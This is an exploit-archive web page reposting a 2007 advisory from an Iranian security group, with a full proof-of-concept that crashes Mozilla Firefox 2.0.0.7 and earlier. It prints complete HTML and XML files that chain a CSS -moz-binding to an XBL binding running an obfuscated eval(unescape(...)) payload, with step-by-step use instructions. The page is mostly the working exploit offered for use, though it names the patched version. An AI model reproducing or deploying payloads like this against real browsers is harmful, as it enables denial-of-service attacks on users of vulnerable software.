首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit 来源：WwW.AmnPardaz.Com 作者：Shahin 发布时间：2007-10-23   i######################### WwW.BugReport.ir ######################### # #      AmnPardaz Security Research & Penetration Testing Group # # Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service # Vendor URL: www.mozilla.org # Version: <= 2.0.0.7 # Fix Available: Yes! # Soloution: Update to 2.0.0.8 # Note: This bug works on 2.0.0.8 in different way. Although this bug doesn't crash 2.0.0.8, it causes not showing html code by viewing source in Mozilla Firefox 2.0.0.8 and this is another bug on 2.0.0.8! # Proof: http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm # ######################### WwW.AmnPardaz.com ######################## # # Leaders : Shahin Ramezany & Sorush Dalili # Team Members: Amir Hossein Khonakdar, Hamid Farhadi # Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com # Country: Iran # Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net # Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com> # ######################## Bug Description ########################### # # To do this work we need 2 files (Html,XML). # Their codes was written below. # # Save below codes in a HTML file. # -------------------------------------------------------------------- -------------------------------------------------------------------- <html> <head> <style>BODY{-moz-binding:url("moz.xml#xss")}</style> </head> <body> Suddenly see you baby! If you see this bug execution was failed! <script> alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir') </script> </body> </html> -------------------------------------------------------------------- -------------------------------------------------------------------- # # Save below codes in "moz.xml" file. # -------------------------------------------------------------------- -------------------------------------------------------------------- <?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl">   <binding id="xss">     <implementation>       <constructor><![CDATA[ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29'));     ]]></constructor>     </implementation>   </binding> </bindings> -------------------------------------------------------------------- -------------------------------------------------------------------- # # Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.7 it will be crashed and by Mozilla FireFox 2.0.0.8 no code will be showed by viewing the source. # ###################################################################   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PHP 5.x COM functions safe_mod ·DNS Recursion bandwidth amplif ·Apache Tomcat (webdav) Remote ·Oracle 10g CTX_DOC.MARKUP SQL ·BBPortalS <= 2.0 Remote Blind ·eIQnetworks ESA SEARCHREPORT R ·Vanilla <= 1.1.3 Remote Blind ·Jakarta Slide <= 2.1 RC1 Remot ·SMF 1.1.3 Extremely fast Blind ·IBM Tivoli Storage Manager 5.3 ·KNET Webserver <= v1.04c PoC X ·IBM Lotus Domino 7.0.2FP1 IMAP   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved